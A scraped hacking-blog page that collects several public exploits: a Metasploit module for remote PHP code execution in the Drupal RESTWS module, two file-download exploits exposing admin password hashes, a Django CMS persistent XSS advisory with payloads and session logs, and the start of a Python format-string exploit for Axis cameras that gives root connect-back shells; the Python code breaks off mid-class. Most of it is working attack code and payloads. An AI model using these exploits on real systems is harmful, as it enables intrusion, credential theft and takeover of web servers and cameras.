##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
'Description' => %q{
This module exploits the Drupal RESTWS module vulnerability.
RESTWS alters the default page callbacks for entities to provide
additional functionality. A vulnerability in this approach allows
an unauthenticated attacker to send specially crafted requests resulting
in arbitrary PHP execution
This module was tested against RESTWS 7.x with Drupal 7.5
installation on Ubuntu server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Devin Zuczek', # discovery
'Mehmet Ince <mehmet@mehmetince.net>' # msf module
],
'References' =>
[
['URL', 'https://www.drupal.org/node/2765567'],
['URL',
'https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jul 13 2016',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The target URI of the
Drupal installation", '/'])
], self.class
)
end
def check
r = rand_text_alpha(8 + rand(4))
url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r
, "/passthru/echo%20#{r}")
res = send_request_cgi(
'method' => 'GET',
'uri' => url
)
if res && res.body =~ /#{r}/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
random = rand_text_alpha(1 + rand(2))
url = normalize_uri(target_uri.path,
"?q=taxonomy_vocabulary/",
random ,
"/passthru/",
Rex::Text.uri_encode("php -r
'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
)
send_request_cgi(
'method' => 'GET',
'uri' => url
)
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863133831
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: PHP calendar script Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
# Version: All Version
# Download Link : http://www.newsp.eu/calendar.zip
Exploit :
http://site/user.txt
Admin|fe01ce2a7fbac8fafaed7c982a04e229
Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]
Test :
Exploit : http://www.newsp.eu/demo/user.txt
Login Url : http://www.newsp.eu/demo/login.php
Password : demo
Document Title:
===============
Django CMS v3.3.0 - (Editor Snippet) Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1869
Security Release: https://www.djangoproject.com/weblog/2016/jul/18/security-releases/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6186
CVE-ID:
=======
CVE-2016-6186
Release Date:
=============
2016-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
1869
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines.
django CMS offers out-of-the-box support for the common features you’d expect from a CMS, but can also be easily customised and
extended by developers to create a site that is tailored to their precise needs.
(Copy of the Homepage: http://docs.django-cms.org/en/release-3.3.x/upgrade/3.3.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side vulnerability (CVE-2016-6186) in the official Django v3.3.0 Content Management System.
Vulnerability Disclosure Timeline:
==================================
2016-07-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-07-04 Vendor Notification (Django Security Team)
2016-07-07: Vendor Response/Feedback (Django Security Team)
2016-07-18: Vendor Fix/Patch (Django Service Developer Team)
2016-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Divio AG
Product: Django Framework - Content Management System 3.3.0
Divio AG
Product: Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Django v3.3.0 Content Management System.
The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the
application-side of the vulnerable modules web context.
The persistent web vulnerability is located in the `Name` value of the `Editors - Code Snippet` module POST method request.
Remote attackers are able to inject own malicious script code to the snippets name input field to provoke a persistent execution.
The injection point is the snippets add module of the editor. The execution point occurs in the `./djangocms_snippet/snippet/`
data listing after the add. The data context is not escaped or parsed on add to select and thus results in an execute of any
payload inside of the option tag.
The attacker vector of the vulnerability is persistent because of the data is stored on add and request method to inject is POST.
The vulnerability can be exploited against other privileged user accounts of the django application by interaction with already
existing snippets on add.
Already added elements become visible for the other user accounts as well on add interaction. The unescaped data is stored in
the database of the web-application but when rendered in the frontend or in the edit mode, it's properly escaped.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability requires a low privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Editor - Snippets (Add)
Vulnerable Input(s):
[+] Name
Parameter(s):
[+] select
Affected Module(s):
[+] Snippets Options Listing [./djangocms_snippet/snippet/] - option
Proof of Concept (PoC):
=======================
The application-side validation web vulnerability can be exploited by low and high privileged web-application user accounts with low user interaction.
For security demonstration or to reproduce the application-side web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to your django cms website with version 3.3.0
2. Open the structure module
3. Click to edit a page module
Note: Now the editor opens with the main default plugins
4. Mark a text passage and click to the code snippets plugin that is configured by default installation
5. Click the plus to add a new snippet of code
6. Inject a script code payload in java-script to the input field of the Name
7. Save the entry iva POST method request
8. Now click the box to choose the vulnerable injected payload
9. The script code payload executes in the box listing without secure parse or filter to encode
10. Successful reproduce of the application-side validation vulnerability in the editors snippet module!
Note:
Multiple accounts can be exploited by the inject of snippets. When another privileged user account includes a snippet
the stable saved categories provoke the execution of the payload.
PoC: Snippet Module [./djangocms_snippet/snippet/] (Execution Point) <select> <option>
...
<fieldset class="module aligned ">
<div class="form-row field-snippet">
<div>
<label class="required" for="id_snippet">Snippet:</label>
<div class="related-widget-wrapper">
<select id="id_snippet" name="snippet">
<option value="">---------</option>
<option value="3" selected="selected">"><"<img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=http://www.vulnerability-lab.com onload=alert(document.cookie)<>[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]%20<iframe></iframe></option>
<option value="1">Social AddThis</option>
<option value="2">tour "><"<img src="x">%20%20>"<iframe src=a>%20<iframe></option>
</select>
<a href="/en/admin/djangocms_snippet/snippet/3/?_to_field=id&_popup=1" class="related-widget-wrapper-link change-related"
id="change_id_snippet" data-href-template="/en/admin/djangocms_snippet/snippet/__fk__/?_to_field=id&_popup=1" title="Change selected Snippet">
<img src="/static/admin/img/icon_changelink.gif" alt="Change" height="10" width="10">
</a>
<a class="related-widget-wrapper-link add-related" id="add_id_snippet" href="/en/admin/djangocms_snippet/snippet/add/?_to_field=id&_popup=1" title="Add another Snippet">
<img src="/static/admin/img/icon_addlink.gif" alt="Add" height="10" width="10">
</a>
</div>
</div>
</div>
</fieldset>
...
--- PoC Session Logs [POST] (Injection) [GET] (Execution) ---
Status: 200[OK]
POST http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
POST-Daten:
POSTDATA =-----------------------------30880199939743
Content-Disposition: form-data; name="csrfmiddlewaretoken"
LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm
-----------------------------30880199939743
Content-Disposition: form-data; name="_popup"
1
-----------------------------30880199939743
Content-Disposition: form-data; name="_to_field"
id
-----------------------------30880199939743
Content-Disposition: form-data; name="name"
test <img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=a>[PERSISTENT INJECTED SCRIPT CODE VIA SNIPPET NAME!]%20<iframe>
-----------------------------30880199939743
Content-Disposition: form-data; name="html"
sd
-----------------------------30880199939743
Content-Disposition: form-data; name="template"
aldryn_tour/tour.html
-----------------------------30880199939743
Content-Disposition: form-data; name="slug"
tour
-----------------------------30880199939743
Content-Disposition: form-data; name="_save"
Save
-----------------------------30880199939743--
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
X-Aldryn-App[django-cms-3-3-demo-sopegose-stage]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Set-Cookie[sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; expires=Mon, 18-Jul-2016 09:34:19 GMT; Max-Age=1209600; Path=/]
-
Status: 301[MOVED PERMANENTLY]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Location[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x/]
Content-Language[en]
-
Status: 200[OK]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/a/[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html]
Reference(s):
http://django3-3-0.localhost:8080/
http://django3-3-0.localhost:8080/en/
http://django3-3-0.localhost:8080/en/admin/
http://django3-3-0.localhost:8080/en/admin/cms/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/9/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the vulnerable Name input field in the add snippets editor module.
Restrict the input and disallow the usage of special chars. Escape the entries in case of emergency and use plain-text values.
Encode in the snippets module listing the vulnerable box with the name listing to prevent the execution point of the vulnerability.
Resolution:
Patches to resolve the issues have been applied to Django's master development branch and the 1.10, 1.9, and 1.8 release branches.
The patches may be obtained from the following changesets:
- On the development master branch
- On the 1.10 release branch
- On the 1.9 release branch
- On the 1.8 release branch
The following new releases have been issued:
- Django 1.10rc1
- Django 1.9.8
- Django 1.8.14
Reference(s):
https://developer.mozilla.org/en-US/docs/Web/API/element/innerHTML
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the django cms is estimated as medium. (CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
# Exploit Title: Free News Script User Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns
# Version: All Version
# Download Link : http://www.newsp.eu/newsp.zip
Exploit :
http://site/admin/user.txt
Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1|
Username = Admin
Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5]
#!/usr/bin/env python2.7
#
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis <mcw noemail eu> 2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotly exploitable (As anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
# - "One-Write-Where-And-What" for MIPS and CRISv32
# Using "Old Style" POP's
# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
# - "Two-Write-Where-And-What" for ARM
# 1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
# 2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) )POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
# [Big differnce in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>
# <BODY><H1>500 Server Error</H1>
# The server encountered an internal error and could not complete your request.
# </BODY></HTML>
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1. Direct addressing with %<argument>$%n is "delayed", and comes in force only after disconnect.
# Old metod with POP's coming into force instantly
#
# 2. Argument "0" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)
# - Would be interesting to investigate why.
#
# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4. Everything is randomized, except heap.
#
# 5. My initial attempts to use ROP's was not good, as I didn't want to create
# one unique FMS key by testing each single firmware version, and using ROP with FMS
# on heap seems pretty complicated as there is one jump availible, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.
#
# 6. Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS excecuted on heap
#
# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
# so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
# and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8. This exploit are pretty well documented, more details can be extracted by reading
# the code and comments.
#
# MIPS ssid maps
# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid
# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid
# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]
#
# ARM ssid maps
# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid
# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid
# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]
#
# Crisv32 ssid maps
# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid
# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid
# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]
#
# General notes:
#
# When the vul daemon process is exploited, and after popping root connect-back shell,
# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,
# when the main process are fully alive again, I can enjoy the shell, and everybody else can
# enjoy of the camera - that should make all of us happy ;)
# During exploiting, logs says almost nothing, only that the main process restarted.
# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
#
# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),
# after ssid cannot verify the user, free() are the closest function to be called after
# vsyslog(), needed and perfect to use for jumping.
# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.
# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.
#
# Quite surprised to see so many different devices and under one major release version,
# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
#
# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,
# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.
#
# - No hardcoded login/password that could easily be found in firmware/software files.
# - Extremely hard to find without local access (and find out what to trigger for opening the door)
# - Nobody can not actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
#
# Note:
# I don't say that Axis Communication has made this hidden format string by this purpose.
# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,
# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().
#
# Vulnerable and exploitable products
#
# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more
#
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
#
# Firmware versions vulnerable to the SSI FMS exploit
#
# ('V.Vx' == The FMS key used in this exploit)
#
# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)
# 5.00.x 2008 - - no
# 5.01.x 2008 no - no
# 5.02.x 2008 no - -
# 5.05.x 2009 no - -
# 5.06.x 2009 no - -
# 5.07.x 2009 no - no
# 5.08.x 2010 no - -
# 5.09.x 2010 no - -
# 5.10.x 2009 no - -
# 5.11.x 2010 no - -
# 5.12.x 2010 no - -
# 5.15.x 2010 no - -
# 5.16.x 2010 no - -
# 5.20.x 2010-2011 5.2x - 5.2x
# 5.21.x 2011 5.2x - 5.2x
# 5.22.x 2011 5.2x - -
# 5.25.x 2011 5.2x - -
# 5.40.x 2011 5.4x 5.4x 5.4x
# 5.41.x 2012 5.4x - -
# 5.50.x 2013 5.5x 5.5x 5.4x
# 5.51.x 2013 - 5.4x -
# 5.55.x 2013 - 5.5x 5.5x
# 5.60.x 2014 - 5.6x 5.6x
# 5.65.x 2014-2015 - 5.6x -
# 5.70.x 2015 - 5.7x -
# 5.75.x 2015 - 5.7x 5.7x
# 5.80.x 2015 - 5.8x 5.8x
# 5.81.x 2015 - 5.8x -
# 5.85.x 2015 - 5.8x 5.8x
# 5.90.x 2015 - 5.9x -
# 5.95.x 2016 - 5.9x 5.8x
# 6.10.x 2016 - 6.1x -
# 6.15.x 2016 - - 6.1x
# 6.20.x 2016 - 6.2x -
#
# Vendor URL's of still supported and affected products
#
# http://www.axis.com/global/en/products/access-control
# http://www.axis.com/global/en/products/video-encoders
# http://www.axis.com/global/en/products/network-cameras
# http://www.axis.com/global/en/products/audio
#
# Axis Product Security
#
# product-security@axis.com
# http://www.axis.com/global/en/support/product-security
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
# http://www.axis.com/global/en/support/faq/FAQ116268
#
# Timetable
#
# - Research and Development: 06/01/2016 - 01/06/2016
# - Sent vulnerability details to vendor: 05/06/2016
# - Vendor responce received: 06/06/2016
# - Vendor ACK of findings received: 07/06/2016
# - Vendor sent verification image: 13/06/2016
# - Confirmed that exploit do not work after vendors correction: 13/06/2016
# - Vendor informed about their service release(s): 29/06/2016
# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
# - Full Disclosure: 18/07/2016
#
# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
#
# Have a nice day
# /bashis
#
#####################################################################################
import sys
import string
import socket
import time
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import re
class do_FMS:
# POP = "%8x" # Old style POP's with 8 bytes per POP
POP = "%1c" # Old style POP's with 1 byte per POP
WRITElln = "%lln" # Write 8 bytes
WRITEn = "%n" # Write 4 bytes
WRITEhn = "%hn" # Write 2 bytes
WRITEhhn = "%hhn" # Write 1 byte
def __init__(self,targetIP,verbose):
self.targetIP = targetIP
self.verbose = verbose
self.fmscode = ""
# Mostly used internally in this function
def Add(self, data):
self.fmscode += data
# 'New Style' Double word (8 bytes)
def AddDirectParameterLLN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$lln')
# 'New Style' Word (4 bytes)
def AddDirectParameterN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$n')
# 'New Style' Half word (2 bytes)
def AddDirectParameterHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hn')
# 'New Style' One Byte (1 byte)
def AddDirectParameterHHN(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('$hhn')
# Addressing
def AddADDR(self, ADDR):
self.Add('%')
self.Add(str(ADDR))
self.Add('u')
# 'Old Style' POP
def AddPOP(self, size):
if size != 0:
self.Add(self.POP * size)
# Normally only one will be sent, multiple is good to quick-check for any FMS
#
# 'Old Style' Double word (8 bytes)
def AddWRITElln(self, size):
self.Add(self.WRITElln * size)
# 'Old Style' Word (4 bytes)
def AddWRITEn(self, size):
self.Add(self.WRITEn * size)
# 'Old Style' Half word (2 bytes)
def AddWRITEhn(self, size):
self.Add(self.WRITEhn * size)
# 'Old Style' One byte (1 byte)
def AddWRITEhhn(self, size):
self.Add(self.WRITEhhn * size)
# Return the whole FMS string
def FMSbuild(self):
return self.fmscode
class HTTPconnect:
def __init__(self, host, proto, verbose, creds, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.noexploit = noexploit
# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\t','$','`' etc..
def RAW(self, uri):
